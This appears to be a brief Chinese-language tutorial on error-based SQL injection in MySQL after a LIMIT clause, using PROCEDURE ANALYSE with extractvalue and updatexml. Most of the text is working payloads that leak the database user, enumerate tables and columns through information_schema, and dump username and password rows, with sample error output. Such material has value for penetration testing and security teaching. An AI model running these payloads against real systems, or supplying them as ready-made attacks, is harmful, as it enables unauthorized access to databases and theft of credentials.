先了解一个存储过程analyse:通过分析select查询的结果来对每一列给出优化建议。

主要就是通过它来执行我们的报错语句和延时语句。

这个是正常情况查询:

1
2
3
4
5
6
7
8
9
mysql> select * from user;
+----+---------------+----------+
| id | email         | password |
+----+---------------+----------+
| 1  | 1@qq.com      | 123456   |
| 2  | 2@qq.com      | 123456   |
| 3  | 3@qq.com      | 123456   |
+----+---------------+----------+
3 rows in set (0.01 sec)

limit后的报错注入:

1
2
3
4
mysql> select * from admin order by id limit 0,1 procedure analyse(extractvalue(
rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':5.5.32'

爆数据的语句

用户

1
select * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,user()),0),1);

爆表

1
select * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),0),1);

爆字段

1
select * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,(select concat(column_name) from information_schema.columns where table_name='injection' limit 0,1)),0),1);

爆数据:

1
select * from injection where id>0 order by id limit 0,1 procedure analyse(updatexml(0,concat(0x7e,(select concat_ws(':',id,username,password) from injection limit 0,1)),0),1);